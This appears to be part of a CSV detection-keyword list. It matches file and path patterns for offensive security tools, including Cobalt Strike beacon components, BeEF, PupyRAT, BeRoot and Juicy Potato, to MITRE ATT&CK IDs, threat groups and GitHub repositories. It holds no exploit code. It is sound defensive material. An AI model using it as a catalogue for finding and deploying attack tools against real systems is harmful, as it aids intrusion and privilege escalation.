"*/Bat-Potato.bat*",".{0,1000}\/Bat\-Potato\.bat.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","1","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","5574"
"*/Bat-Potato.git*",".{0,1000}\/Bat\-Potato\.git.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","1","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","5575"
"*/bazarloader.profile*",".{0,1000}\/bazarloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","5576"
"*/bbaranoff/CVE-2022-0847/*",".{0,1000}\/bbaranoff\/CVE\-2022\-0847\/.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z","5577"
"*/beacon_202_no_acl.log*",".{0,1000}\/beacon_202_no_acl\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","#logfile #linux","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5578"
"*/beacon_257-objects.log*",".{0,1000}\/beacon_257\-objects\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","#linux","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5579"
"*/beacon_compatibility*",".{0,1000}\/beacon_compatibility.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","5580"
"*/beacon_compatibility.*",".{0,1000}\/beacon_compatibility\..{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","5581"
"*/beacon_funcs/*",".{0,1000}\/beacon_funcs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","5582"
"*/beacon_generate.py*",".{0,1000}\/beacon_generate\.py.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","5583"
"*/beacon_health_check/*",".{0,1000}\/beacon_health_check\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","N/A","10","10","142","21","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z","5584"
"*/beacon_http/*",".{0,1000}\/beacon_http\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5585"
"*/beacon_notify.cna*",".{0,1000}\/beacon_notify\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","5586"
"*/BeaconChannel.cs*",".{0,1000}\/BeaconChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","5587"
"*/beaconhealth.cna*",".{0,1000}\/beaconhealth\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","N/A","10","10","142","21","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z","5588"
"*/beacon-injection/*",".{0,1000}\/beacon\-injection\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","5589"
"*/beacon-object-file*",".{0,1000}\/beacon\-object\-file.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/realoriginal/beacon-object-file","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5590"
"*/BeaconTool.java*",".{0,1000}\/BeaconTool\.java.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","5591"
"*/beef.git*",".{0,1000}\/beef\.git.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5592"
"*/beef/extensions/*.rb*",".{0,1000}\/beef\/extensions\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5593"
"*/beef_bind_shell/*",".{0,1000}\/beef_bind_shell\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5594"
"*/beef_common.js*",".{0,1000}\/beef_common\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5595"
"*/beefbind/*",".{0,1000}\/beefbind\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5596"
"*/beefproject/*",".{0,1000}\/beefproject\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","5597"
"*/Ben0xA/*",".{0,1000}\/Ben0xA\/.{0,1000}","offensive_tool_keyword","Github Username","Github username of known powershell offensive modules and scripts","T1059 - T1027 - T1064 - T1086 - T1191 - T1202","TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Ben0xA","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5598"
"*/beRoot.exe*",".{0,1000}\/beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5599"
"*/BeRoot.git*",".{0,1000}\/BeRoot\.git.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5600"
"*/beRoot.py*",".{0,1000}\/beRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","5601"
"*/beroot.py*",".{0,1000}\/beroot\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","5602"
